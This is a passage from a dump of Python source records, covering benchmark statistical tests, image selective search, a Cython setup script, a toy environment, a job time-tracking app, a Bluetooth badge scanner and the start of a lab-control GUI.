Losses(metric)\n        for res in self._results_list:\n            y_pred = res.y_pred\n            y_pred = list(map(float, y_pred))\n            y_true = res.y_true\n            y_true = list(map(float, y_true))\n\n            losses.evaluate(predictions=y_pred,\n                            true_labels=y_true,\n                            dataset_name=res.dataset_name,\n                            strategy_name=res.strategy_name)\n        return losses.get_losses()\n\n    def average_and_std_error(self, scores_dict):\n        \"\"\"\n        Calculates simple average and standard error.\n\n        Paramteters\n        -----------\n        scores_dict : dictionary\n            Dictionary with estimators (keys) and corresponding prediction accuracies on different datasets.\n        \n        Returns\n        -------\n        pandas DataFrame\n            result with average score and standard error\n        \"\"\"\n        result = {}\n        for k in scores_dict.keys():\n            average = np.average(scores_dict[k])\n            n = len(scores_dict[k])\n            std_error = np.std(scores_dict[k]) / np.sqrt(n)\n            result[k] = [average, std_error]\n\n        res_df = pd.DataFrame.from_dict(result, orient='index')\n        res_df.columns = ['avg_score', 'std_error']\n        res_df = res_df.sort_values(['avg_score', 'std_error'], ascending=[1, 1])\n\n        return res_df\n\n    def plot_boxcharts(self, scores_dict):\n        data = []\n        labels = []\n        avg_error = []\n        for e in scores_dict.keys():\n            data.append(scores_dict[e])\n            avg_error.append(np.mean(scores_dict[e]))\n            labels.append(e)\n        # sort data and labels based on avg_error\n        idx_sort = np.array(avg_error).argsort()\n        data = [data[i] for i in idx_sort]\n        labels = [labels[i] for i in idx_sort]\n        # plot the results\n        fig, ax = plt.subplots()\n        ax.boxplot(data)\n        ax.set_xticklabels(labels, rotation=90)\n        plt.tight_layout()\n\n        return fig\n\n    def ranks(self, strategy_dict, ascending=True):\n        \"\"\"\n        Calculates the average ranks based on the performance of each estimator on each dataset\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        ascending: boolean\n            Rank the values in ascending (True) or descending (False) order\n\n        Returns\n        -------\n        DataFrame\n            Returns the mean peformance rank for each estimator\n        \"\"\"\n        if not isinstance(ascending, bool):\n            raise ValueError('Variable ascending needs to be boolean')\n\n        df = pd.DataFrame(strategy_dict)\n        ranked = df.rank(axis=1, ascending=ascending)\n        mean_r = pd.DataFrame(ranked.mean(axis=0))\n        mean_r.columns = ['avg_rank']\n        mean_r = mean_r.sort_values('avg_rank', ascending=ascending)\n        return mean_r\n\n    def t_test(self, strategy_dict):\n        \"\"\"\n        Runs t-test on all possible combinations between the estimators.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple \n            pandas DataFrame (Database style and MultiIndex)\n        \"\"\"\n        t_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        values = np.array([])\n        for perm in perms:\n            x = np.array(strategy_dict[perm[0]])\n            y = np.array(strategy_dict[perm[1]])\n            t_stat, p_val = ttest_ind(x, y)\n\n            t_test = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                't_stat': t_stat,\n                'p_val': p_val\n            }\n\n            t_df = t_df.append(t_test, ignore_index=True)\n            values = np.append(values, t_stat)\n            values = np.append(values, p_val)\n\n        index = t_df['estimator_1'].unique()\n        values_names = ['t_stat', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return t_df, values_df_multiindex\n\n    def sign_test(self, strategy_dict):\n        \"\"\"\n        Non-parametric test for test for consistent differences between pairs of observations. See ``_ for details about the test and ``_ for details about the scipy implementation.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple of dataframes \n            pandas DataFrame (Database style), pivot table)\n        \"\"\"\n        sign_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        for perm in perms:\n            x = np.array(strategy_dict[perm[0]])\n            y = np.array(strategy_dict[perm[1]])\n            signs = np.sum([i[0] > i[1] for i in zip(x, y)])\n            n = len(x)\n            p_val = stats.binom_test(signs, n)\n            sign_test = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                'p_val': p_val\n            }\n\n            sign_df = sign_df.append(sign_test, ignore_index=True)\n            sign_df_pivot = sign_df.pivot(index='estimator_1', columns='estimator_2', values='p_val')\n\n        return sign_df, sign_df_pivot\n\n    def ranksum_test(self, strategy_dict):\n        \"\"\"\n        Non-parametric test for testing consistent differences between pairs of obeservations.\n        The test counts the number of observations that are greater, smaller and equal to the mean\n        ``_.\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        Returns\n        -------\n        tuple of pandas DataFrame \n            Database style and MultiIndex\n        \"\"\"\n        ranksum_df = pd.DataFrame()\n        perms = itertools.product(strategy_dict.keys(), repeat=2)\n        values = np.array([])\n        for perm in perms:\n            comb = perm[0] + ' - ' + perm[1]\n            x = strategy_dict[perm[0]]\n            y = strategy_dict[perm[1]]\n            t_stat, p_val = ranksums(x, y)\n            ranksum = {\n                'estimator_1': perm[0],\n                'estimator_2': perm[1],\n                't_stat': t_stat,\n                'p_val': p_val\n            }\n            ranksum_df = ranksum_df.append(ranksum, ignore_index=True)\n            values = np.append(values, t_stat)\n            values = np.append(values, p_val)\n\n        index = ranksum_df['estimator_1'].unique()\n        values_names = ['t_stat', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return ranksum_df, values_df_multiindex\n\n    def t_test_with_bonferroni_correction(self, strategy_dict, alpha=0.05):\n        \"\"\"\n        correction used to counteract multiple comparissons\n        https://en.wikipedia.org/wiki/Bonferroni_correction\n\n        \n        Parameters\n        ----------\n        strategy_dict: dictionary\n            dictionay with keys `names of estimators` and values `errors achieved by estimators on test datasets`.\n        alpha: float\n            confidence level.\n        Returns\n        -------\n        DataFrame \n            MultiIndex DataFrame\n        \"\"\"\n        df_t_test, _ = self.t_test(strategy_dict)\n        idx_estim_1 = df_t_test['estimator_1'].unique()\n        idx_estim_2 = df_t_test['estimator_2'].unique()\n        estim_1 = len(idx_estim_1)\n        estim_2 = len(idx_estim_2)\n        critical_value = alpha / (estim_1 * estim_2)\n\n        bonfer_test = df_t_test['p_val'] <= critical_value\n\n        bonfer_test_reshaped = bonfer_test.values.reshape(estim_1, estim_2)\n\n        bonfer_df = pd.DataFrame(bonfer_test_reshaped, index=idx_estim_1, columns=idx_estim_2)\n\n        return bonfer_df\n\n    def wilcoxon_test(self, strategy_dict):\n        \"\"\"http://en.wikipedia.org/wiki/Wilcoxon_signed-rank_test\n        `Wilcoxon signed-rank test `_.\n        Tests whether two  related paired samples come from the same distribution. \n        In particular, it tests whether the distribution of the differences x-y is symmetric about zero\n\n        Parameters\n        ----------\n        strategy_dict: dictionary\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        tuple \n            pandas DataFrame (Database style and MultiIndex)\n        \"\"\"\n        wilcoxon_df = pd.DataFrame()\n        values = np.array([])\n        prod = itertools.product(strategy_dict.keys(), repeat=2)\n        for p in prod:\n            estim_1 = p[0]\n            estim_2 = p[1]\n            w, p_val = stats.wilcoxon(strategy_dict[p[0]],\n                                      strategy_dict[p[1]])\n\n            w_test = {\n                'estimator_1': estim_1,\n                'estimator_2': estim_2,\n                'statistic': w,\n                'p_val': p_val\n            }\n\n            wilcoxon_df = wilcoxon_df.append(w_test, ignore_index=True)\n            values = np.append(values, w)\n            values = np.append(values, p_val)\n\n        index = wilcoxon_df['estimator_1'].unique()\n        values_names = ['statistic', 'p_val']\n        col_idx = pd.MultiIndex.from_product([index, values_names])\n        values_reshaped = values.reshape(len(index), len(values_names) * len(index))\n\n        values_df_multiindex = pd.DataFrame(values_reshaped, index=index, columns=col_idx)\n\n        return wilcoxon_df, values_df_multiindex\n\n    def friedman_test(self, strategy_dict):\n        \"\"\"\n        The Friedman test is a non-parametric statistical test used to detect differences \n        in treatments across multiple test attempts. The procedure involves ranking each row (or block) together, \n        then considering the values of ranks by columns.\n        Implementation used: `scipy.stats `_. \n        \n        Parameters\n        ----------\n        strategy_dict : dict\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        tuple \n            dictionary, pandas DataFrame.\n        \n        \"\"\"\n\n        \"\"\"\n        use the * operator to unpack a sequence\n        https://stackoverflow.com/questions/2921847/what-does-the-star-operator-mean/2921893#2921893\n        \"\"\"\n        friedman_test = stats.friedmanchisquare(*[strategy_dict[k] for k in strategy_dict.keys()])\n        values = [friedman_test[0], friedman_test[1]]\n        values_df = pd.DataFrame([values], columns=['statistic', 'p_value'])\n\n        return friedman_test, values_df\n\n    def nemenyi(self, strategy_dict):\n        \"\"\"\n        Post-hoc test run if the `friedman_test` reveals statistical significance.\n        For more information see `Nemenyi test `_.\n        Implementation used `scikit-posthocs `_.\n        \n        Parameters\n        ----------\n        strategy_dict : dict\n            Dictionary with errors on test sets achieved by estimators.\n        Returns\n        -------\n        pandas DataFrame\n            Results of te Nemenyi test\n        \"\"\"\n\n        strategy_dict = pd.DataFrame(strategy_dict)\n        strategy_dict = strategy_dict.melt(var_name='groups', value_name='values')\n        nemenyi = sp.posthoc_nemenyi(strategy_dict, val_col='values', group_col='groups')\n        return nemenyi\n","sub_path":"sktime/experiments/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"493466805","text":"import cv2\nimport os\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport config\nimport numpy as np\nimport utils\nfrom skimage.transform import resize\n\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\n\ndef SelectiveSearch(img, crop=False, resizing=False, saveFiles=False, maxSave=2000, min_s=500, big_regions=40000):\n    im = plt.imread(img)\n\n    if crop:\n        newHeight = min(1500, im.shape[0])\n        newWidth = min(1500, im.shape[1])\n\n        im = im[0:newHeight, 0:newWidth]\n\n    elif resizing:\n        if im.shape[0]>1000 or im.shape[1]>1000:\n            if im.shape[0] >= im.shape[1]:\n                newHeight = 1000\n                newWidth = int(im.shape[1] * 1000 / im.shape[0])\n            else:\n                newWidth = 1000\n                newHeight = int(im.shape[0] * 1000 / im.shape[1])\n\n            im = resize(im, (newHeight, newWidth), anti_aliasing=True)\n            im = im.astype(\"float32\")\n\n    # create Selective Search Segmentation Object using default parameters\n    ss = cv2.ximgproc.segmentation.createSelectiveSearchSegmentation()\n\n    # create Graph Segmentation to be able to define parameters\n    gs = cv2.ximgproc.segmentation.createGraphSegmentation(sigma=0.8, k=1, min_size=min_s)\n\n    # set input image on which we will run segmentation\n    ss.setBaseImage(im)\n\n    ss.switchToSelectiveSearchFast()\n    # ss.switchToSelectiveSearchQuality()\n\n    # add Graph Segmentation to Search Segmentation\n    ss.addGraphSegmentation(gs)\n\n    # run selective search segmentation on input image\n    rects = ss.process()\n    print('Total Number of Region Proposals: {}'.format(len(rects)))\n\n    print(\"Deleting big regions...\")\n    rects = rects[np.where(rects[:, 2]*rects[:, 3] < big_regions)]\n    print(\"Regions after deleting: {}\".format(len(rects)))\n\n    rects = utils.bbox_to_max(rects)\n\n    if saveFiles:\n        print(\"Saving regions...\")\n        # iterate over all the region proposals\n        for i, rect in enumerate(rects):\n            # draw rectangle for region proposal till numShowRects\n            if i < maxSave:\n                x, y, w, h = rect\n                output_file = os.path.join(config.OUTPUT_REGIONS, os.path.splitext(os.path.basename(img))[0] + \"_\" + str(i) + \".png\")\n                plt.imsave(output_file, tf.image.crop_to_bounding_box(im, y, x, h, w))\n            else:\n                break\n\n    return im, rects[:2000]\n","sub_path":"code/selective_search.py","file_name":"selective_search.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"454849611","text":"import sys\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n\nEXTRA_COMPILE_ARGS=[]\nif sys.platform == 'darwin':              # Mac OS X?\n    EXTRA_COMPILE_ARGS.extend(['-arch', 'x86_64', '-mmacosx-version-min=10.7',\n                               '-std=c++11', '-stdlib=libc++'])\n \n\nsetup(\n   name='bbhash',\n   version='0.1dev2',\n   description=\"A Python wrapper for the BBHash Minimal Perfect Hash Function\",\n   author=\"C. Titus Brown\",\n   author_email=\"titus@idyll.org\",\n   license=\"BSD 3-clause\",\n   url=\"http://github.com/dib-lab/pybbhash\",\n   ext_modules =\n          [Extension('bbhash',\n                     sources=['bbhash.pyx'],\n                     depends=['BooPHF.h'],\n                     language='c++',\n                     extra_compile_args=EXTRA_COMPILE_ARGS)],\n   headers=['BooPHF.h'],\n   cmdclass = {'build_ext': build_ext}\n)\n","sub_path":"pypi_install_script/bbhash-0.1dev2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"296407392","text":"from __future__ import division, unicode_literals, print_function\nimport math\n\nimport numpy as np\n\nfrom regions import NDArrayDataset\n\n\nclass ToyEnvironment:\n    def __init__(self, size, step_size, n_sample_actions=20,\n                 boundary_strategy='walled', distance_measurement='dist',\n                 cutoff_factor=5, static=True, blind=False):\n        self.size = size\n        self.step_size = step_size\n        self.n_sample_actions = n_sample_actions\n        self.cutoff_factor = cutoff_factor\n        self.static = static\n        self.blind = blind\n        self._observer = None\n        strategies = {'toroid': self._toroidize, 'walled': self._wall_in}\n        if boundary_strategy not in strategies:\n            raise Exception('Illegal boundary strategy')\n        self._boundary_strategy = strategies[boundary_strategy]\n        if distance_measurement not in {'dist', 'exp'}:\n            raise Exception('Illegal distance measurement')\n        self.distance_measurement = distance_measurement\n        self.r = np.random.rand(2) * self.size - self.half_size\n        # self.b = np.random.rand(2) * self.size - self.half_size\n        self.b = np.array([0, 0], dtype=float)\n\n    def start_observation(self, n_iters):\n        self._observer = NDArrayDataset(n_iters, 6)\n\n    def _toroidize(self, v):\n        hs = self.half_size\n        v[0] = (v[0] + hs) % self.size - hs\n        v[1] = (v[1] + hs) % self.size - hs\n        # Did I get it right? :)\n        assert -hs <= v[0] <= hs\n        assert -hs <= v[1] <= hs\n\n    def _wall_in(self, v):\n        hs = self.half_size\n        if v[0] > hs:\n            v[0] = hs\n        elif v[0] < -hs:\n            v[0] = -hs\n        if v[1] > hs:\n            v[1] = hs\n        elif v[1] < -hs:\n            v[1] = -hs\n\n    def act(self, m):\n        mov, freq = m[:2], m[2]\n        if not self.static:\n            if freq > 0.66:  # [0.66, 1] -> predictable\n                self.b = np.copy(self.r)\n            elif freq < 0.33:  # [0, 0.33] -> not predictable\n                random_b_shape = np.random.random(self.b.shape)\n                self.b += self._movement_modifier(random_b_shape)\n                self._boundary_strategy(self.b)\n            else:  # [0.33, 0.66] -> predictable\n                pass\n\n        self.r += mov\n        self._boundary_strategy(self.r)\n        if self._observer is not None:\n            self._observer.update(np.concatenate((self.r, self._signal(), m)))\n\n    def sense(self):\n        if self.blind:\n            return self._signal()\n        return np.concatenate((self.r, self._signal()))\n\n    def _signal(self):\n        distance = np.linalg.norm(self.r - self.b)\n        if self.distance_measurement == 'dist':\n            return np.array([distance])\n        return np.array([math.exp(-self.cutoff_factor * distance)])\n\n    @property\n    def s_len(self):\n        if self.blind:\n            return 1  # [signal]\n        return 3  # [x, y, signal]\n\n    @property\n    def m_len(self):\n        return 3  # [dx, dy, freq]\n\n    @property\n    def all_actions(self):\n        return self._gen_actions\n\n    @property\n    def half_size(self):\n        return self.size / 2\n\n    @property\n    def observer(self):\n        if self._observer is None:\n            raise Exception('No observer set.')\n        return self._observer\n\n    def _gen_actions(self):\n        actions = np.random.rand(self.n_sample_actions, self.m_len)\n        actions[:, :2] = self._movement_modifier(actions[:, :2])\n        return actions\n\n    def _movement_modifier(self, m):\n        return m * (2 * self.step_size) - self.step_size","sub_path":"iac/environments.py","file_name":"environments.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"195796551","text":"# -*- encoding: utf-8 -*-\n\nimport unittest\n\nclass TestSomething(unittest.TestCase):\n    def test_unicode(self):\n        self.assertEqual(u'Русский', u'Текст')\n\nif __name__ == '__main__':\n    import sys\n    reload(sys)\n    sys.setdefaultencoding('utf8')\n    unittest.main()\n","sub_path":"all-gists/3976411/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"349322042","text":"\"\"\"Module that provides classes to handle the application.\"\"\"\nfrom datetime import datetime\nimport subprocess\nfrom re import search\nfrom backend import jobs, results as rs, filesys as fs\nimport basic\n\nclass AdminData():\n    \"\"\"Handle administrative and configuration data.\"\"\"\n\n    def __init__(self):\n        \"\"\"Constructor.\"\"\"\n        self.selected_job_name = None\n\n    def from_json(self, d):\n        \"\"\"Load admin data from a dict (loaded from json).\"\"\"\n        if not d is None:\n            self.__dict__ = d\n\n    def get_keys(self):\n        \"\"\"Return the attributes that will be saved to json.\"\"\"\n        return [\"selected_job_name\"]\n\n    def select_job(self, name):\n        # REFACTOR: use property\n        self.selected_job_name = name\n\n    def get_selected_job(self):\n        return self.selected_job_name\n\n    def update(self):\n        \"\"\"Update function.\"\"\"\n\n        ### ADD YOUR UPDATES HERE ###\n\nclass Application():\n    \"\"\"Handle the application.\"\"\"\n\n    def __init__(self, root_path, notify=False):\n        \"\"\"Constructor.\"\"\"\n        self.fh = fs.JobFileHandler(root_path, \"files\") # HACK: \"files\" hardcoded\n        self._mark_time()\n        self.admin_fh = fs.AdminFileHandler(root_path, \"config\", \"admin\") # \"config\" and \"admin\" hardcoded\n        self.admin_data = AdminData()\n        self.admin_data.from_json(self.admin_fh.load_admin())\n\n        self.notify = notify\n\n    def close(self):\n        \"\"\"Close the application.\"\"\"\n        self.admin_fh.save_admin(self.admin_data)\n\n    def _choose_name(self, name):\n        \"\"\"If name is None, return the selected name in the admin data.\"\"\"\n        return name or self.admin_data.get_selected_job()\n\n    def _load_job(self, name):\n        \"\"\"Load a job given a name.\"\"\"\n        job = jobs.Job()\n        json_dict = self.fh.load_job(name)\n        job.from_json(json_dict)\n\n        return job\n\n    def _save_job(self, j):\n        \"\"\"Given a job, dump it to a json file.\"\"\"\n\n        # Make sure it can be dump\n        if not j.can_dump():\n            basic.perror(\"Job can't be saved to json\")\n\n        # Get name\n        name = j.get_name()\n\n        # Assure folder\n        self.fh.save_job(j, name)\n\n    def _get_job_names(self):\n        \"\"\"Get all the existing job names.\"\"\"\n        return self.fh.list_jobs()\n\n    def _exist_job(self, name, archive=False):\n        \"\"\"Bool indicating if job exists\"\"\"\n        return self.fh.exist_job(name, archive=archive)\n\n    def _assert_time(self, action=\"action\"):\n        \"\"\"Assert the time variable set.\"\"\"\n        if self.t is None:\n            basic.perror(\"Can't {} without a timestamp\".format(action))\n\n    def _mark_time(self):\n        \"\"\"Saves the current time.\"\"\"\n        self.t = datetime.now()\n\n    def _notify_action(self, jobname=None, action=None, more_title=None):\n        \"\"\"Notify an action to the screen.\"\"\"\n        if self.notify:\n            title = \"Worktime\"\n            if not more_title is None:\n                title += \" - {}\".format(more_title)\n            message = jobname or \"\"\n            message += \" \"\n            message += action or \"\"\n            subprocess.run(\"notify-send --urgency=critical '{}' '{}'\".format(title, message), shell=True)\n            # NOTE: use return_value.returncode of run() to see the status of the called command\n\n    def _select_job_GUI(self):\n        \"\"\"Prompt the user to select a job using zenity.\"\"\"\n        column_title = 'Jobs' # TASK: move to config parameters\n        message = 'Select a Job'\n        jobs = ' '.join(self._get_job_names())\n        height = 300 # TODO: change this according to the amount of jobs # height=300 works fine for up to 8 or 9 jobs\n        command = \"zenity --column='{}' --title='{}' --list {} --height={}\".format(column_title, message, jobs, height)\n        result = subprocess.run(command, shell=True, stdout=subprocess.PIPE)\n        selected = result.stdout.decode('utf-8').strip()\n        return selected or None\n\n    \"\"\"API methods\"\"\"\n    def start_job(self, name, info):\n        \"\"\"Option to start a job.\"\"\"\n        self._assert_time(\"start a job\")\n\n        # REFACTOR: this is copied in start/stop/pause methods, use decorators\n        name = self._choose_name(name)\n        if name is None:\n            return rs.StartResult(rs.ResultType.NotSelected)\n\n        if not self._exist_job(name):\n            return rs.StartResult(rs.ResultType.NotExist, jobname=name)\n\n        job = self._load_job(name)\n        result = job.start(self.t, info)\n        if result.is_ok():\n            self._save_job(job)\n\n        if name != self.admin_data.get_selected_job():\n            # Not selected, select it\n            self.select_job(name)\n\n        return result\n\n    def stop_job(self, name, confirmation, info=None, discard=False, force_seconds=None):\n        \"\"\"Option to stop a job.\n\n        confirmation -- function to call if confirmation for discarding an entry is needed\"\"\"\n\n        self._assert_time(\"stop a job\")\n\n        name = self._choose_name(name)\n        if name is None:\n            return rs.StopResult(rs.ResultType.NotSelected)\n\n        if not self._exist_job(name):\n            return rs.StopResult(rs.ResultType.NotExist, jobname=name)\n\n        j = self._load_job(name)\n\n        # Confirmation\n        if j.confirm_discard(): # Confirmation needed\n            if not confirmation(): # Ask for confirmation\n                discard = False\n\n        result = j.stop(self.t, discard=discard, obs=info, force_seconds=force_seconds)\n\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def pause_job(self, name):\n        \"\"\"Option to pause a job.\"\"\"\n        self._assert_time(\"pause a job\")\n\n        name = self._choose_name(name)\n        if name is None:\n            return rs.PauseResult(rs.ResultType.NotSelected)\n\n        j = self._load_job(name)\n        result = j.pause(self.t)\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def create_job(self, name, confirmation, lname=None, info=None, tags=None):\n        \"\"\"Option to create a job.\"\"\"\n        if self._exist_job(name):\n            if not confirmation():\n                return rs.Result(rs.ResultType.Cancelled)\n\n        j = jobs.Job()\n        result = j.create(name, lname, info, tags)\n\n        if result.is_ok():\n            self._save_job(j)\n\n        return result\n\n    def edit_job(self, name, new_name=None, new_lname=None, new_info=None, info_mode=None, new_tags=None, tags_mode=None):\n        \"\"\"Option to edit a job.\"\"\"\n\n        basic.perror(\"DEPRECATED: can't edit job\")\n\n        j = self._load_job(name)\n\n        # Cambiar nombre\n        if not new_name is None:\n            # j.change_name(new_name)\n            pass # TODO\n\n        if not new_lname is None:\n            j.change_longname(new_lname)\n\n        if not new_info is None:\n            j.edit_info(new_info, info_mode)\n\n        if not new_tags is None:\n            j.edit_tags(new_tags, tags_mode)\n\n        self._save_job(j)\n\n    def delete_job(self, name, confirmation, force=False):\n        \"\"\"Option to delete a job.\"\"\"\n\n        if not self._exist_job(name):\n            return rs.DeleteResult(rs.ResultType.NotExist)\n\n        deleted = False\n        if force or confirmation():\n            j = self._load_job(name)\n            self.fh.remove_job(name)\n            deleted = True\n\n        return rs.DeleteResult(was_deleted=deleted)\n\n    def select_job(self, name):\n        \"\"\"Select a job to use later without calling the name.\"\"\"\n        if name is None:\n            return rs.Result(rs.ResultType.NoneNotAccepted)\n        elif self._exist_job(name):\n            self.admin_data.select_job(name)\n            return rs.Result()\n        else:\n            return rs.Result(rs.ResultType.NotExist)\n\n    def unselect_job(self):\n        \"\"\"Unselect a job.\"\"\"\n        prev_jobname = self.admin_data.get_selected_job()\n        if not prev_jobname is None:\n            self.admin_data.select_job(None)\n            return rs.UnselectResult(jobname=prev_jobname)\n        else:\n            return rs.UnselectResult(status=rs.ResultType.NotSelected)\n\n    def show_jobs(self, name, run_only=False):\n        \"\"\"Option to show jobs.\"\"\"\n\n        def match_regex(k, m):\n            \"\"\"Boolean matching k with m, using regex.\"\"\"\n            return not search(m, k) is None\n\n        def is_running(j):\n            \"\"\"Boolean, job is running.\"\"\"\n            return j.is_running\n\n        def dont_match(dummy1=None, dummy2=None):\n            \"\"\"Return true always, i.e don't match.\"\"\"\n            return True\n\n        names = self._get_job_names()\n\n        # Functions to filter\n        match = dont_match if name is None else match_regex\n        filter_running = dont_match if not run_only else is_running\n\n        results = rs.ShowResult()\n        for n in names:\n            j = self._load_job(n)\n            if match(n, name) and filter_running(j):\n                result = j.show(self.t)\n                results.add_job(result)\n\n        return results\n\n    def backup_jobs(self):\n        \"\"\"Backup existing jobs.\"\"\"\n        for name in self._get_job_names():\n            self.fh.backup_job(name)\n\n        return rs.Result()\n\n    def archive_job(self, name, unarchive=False):\n        \"\"\"Archive a job.\"\"\"\n        if not self._exist_job(name, archive=unarchive):\n            # NOTE:\n            # unarchive == False --> archiving, need to check non-archive folder\n            # unarchive == True --> unarchiving, need to check archive folder\n            # HACK: there is no ArchiveResult type, so use StartResult\n            return rs.StartResult(rs.ResultType.NotExist, jobname=name)\n\n        if unarchive:\n            self.fh.unarchive_job(name)\n        else:\n            self.fh.archive_job(name)\n\n        return rs.Result() # everything ok\n\n    def update_jobs(self):\n        \"\"\"Make an update to the Job objects.\"\"\"\n        self.admin_data.update()\n\n        for name in self._get_job_names():\n            j = self._load_job(name)\n            j.update()\n            self._save_job(j)\n\n        return rs.Result()\n\n    def display_help(self, shortcut=True):\n        \"\"\"Display a help message.\"\"\"\n        if not shortcut:\n            print(\"Nothing here\")\n            return\n\n        # HACK: do this from configuration file\n        special_cmd = 'Shift+Alt'\n        commands = [\n            ['Up', 'Start the selected job'],\n            ['Down', 'Stop the selected job'],\n            ['P', 'Pause the selected job'],\n            ['S', 'Show the status of the running jobs'],\n            ['W', 'Select a job interactively'],\n            ['U', 'Unselect the currently selected job'],\n            ['A', 'Show the currently selected job'],\n            ['H', 'Display this help message'],\n            ]\n\n        full_message = \"{} +:\\n\".format(special_cmd)\n        for i in range(len(commands)):\n            key = commands[i][0]\n            help_msg = commands[i][1]\n            full_message += \"\\t{} -- {}\\n\".format(key, help_msg)\n\n        # HACK: use _print_action()\n        # HACK: this should be in console application!!!\n        print(full_message)\n\n        subprocess.run(\"zenity --info --height=200 --text='{}'\".format(full_message), shell=True, stdout=subprocess.PIPE)\n","sub_path":"backend/application/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"372773710","text":"from __future__ import print_function\n\nimport datetime\nimport time\nimport struct\nfrom bluepy import btle\n\n# Looks for badges and return their state (synced or not), the \n# date of the latest scan, and a list of RSSIs\nclass BadgeDiscoverer:\n\tdef __init__(self):\n\t\tself.DEVICE_NAME = \"BADGE\"\n\t\tself.CLOCK_STATE_SYNC = \"CLKSYN\"\n\t\tself.CLOCK_STATE_UNSYNC = \"CLKUN\"\n\t\tself.DEVICE_NAME_FIELD_ID = 9\n\t\n\tdef discover(self, scanDuration = 1): #seconds\n\t\tbtle.Debugging = False\n\t\tscanner = btle.Scanner().withDelegate(ScanDummy())\n\t\traw_devices = scanner.scan(scanDuration)\n\t\t\n\t\tdevices={}\n\t\tfor device in raw_devices:\n\t\t\tdevice_name = None\n\t\t\tfor (sdid, desc, val) in device.getScanData():\n\t\t\t\tif sdid  == self.DEVICE_NAME_FIELD_ID: device_name = val\n\n\t\t\tif device_name == self.DEVICE_NAME:\n\t\t\t\trssi = device.rssi\n\t\t\t\tmac = device.addr.upper()\n\t\t\t\tvoltage = self.unpackBroadcastData(device.rawData)\n\t\t\t\tis_sync = not(self.CLOCK_STATE_UNSYNC in device.rawData)\n\t\t\t\tscan_date = datetime.datetime.now()\n\t\t\t\tif not (mac in devices):\n\t\t\t\t\tdevices[mac] = {'scan_date':scan_date,'is_sync':is_sync,'rssi':rssi,'voltage':voltage}\n\t\t\t\telse:\n\t\t\t\t\tdevices[mac]['rssi']=rssi\n\t\t\t\t\tdevices[mac]['scan_date'] = scan_date\n\n\t\treturn devices\n\n\t# Extract badge specific data from the broadcasting message\n\tdef unpackBroadcastData(self, data):\n\t\tif len(data) >= 26:\n\t\t\tbadgeDataBuffer = data[18:26]\n\t\t\tbadgeInfoArr = struct.unpack(' in a separate process\n#class ManagerShamrockSpectrometer(BaseManager): pass\n#ManagerShamrockSpectrometer.register('ShamrockSpectrometer', ShamrockSpectrometer)\n\n########################################################################\n\nclass SettingsNotebook (wx.Notebook) :\n\t\"\"\"\n\tGUI for listing all settings\n\t\"\"\"\n\tdef __init__(self, parent):\n\t\twx.Notebook.__init__(self, parent)\n\t\t \n\t\tself.Spectrometer = ShamrockSpectrometerTab(self)\n\t\tself.AddPage (self.Spectrometer, \"Spectra settings\")\n\t\t \n\t\tself.PulseShaper = PulseShaperTab(self)\n\t\tself.AddPage (self.PulseShaper, \"Pulse shaper settings\")\n\n\t\tself.RectangularScan = RectangularScanTab(self)\n\t\tself.AddPage (self.RectangularScan, \"Rectangular scan\")\n\t\t \n\t\t# Dictionary to bind names to tabs for saving and loading settings\n\t\tself.settings_to_tabs = {\"Spectrometer\" : self.Spectrometer, \"PulseShaper\" : self.PulseShaper,\n\t\t\t\"RectangularScan\" : self.RectangularScan }\n\t\t \n########################################################################\n\nclass SurfaceControlExperiment (wx.Frame) :\n\t\"\"\"\n\tApplication for running experiments\n\t\"\"\"\n\tdef __init__ (self, parent) :\n\t\t# Starting spectrometer\n\t\tself.Spectrometer = ManagerShamrockSpectrometer()\n\t\tself.SpectrometerProc = self.Spectrometer.start()\n\t\t\n\t\t# Starting pulse shaper\n\t\tself.PulseShaper = ManagerShaper()\n\t\tself.PulseShaperProc = self.PulseShaper.start()\n\t\t\n\t\t# Starting moving stages (by specifying their serial 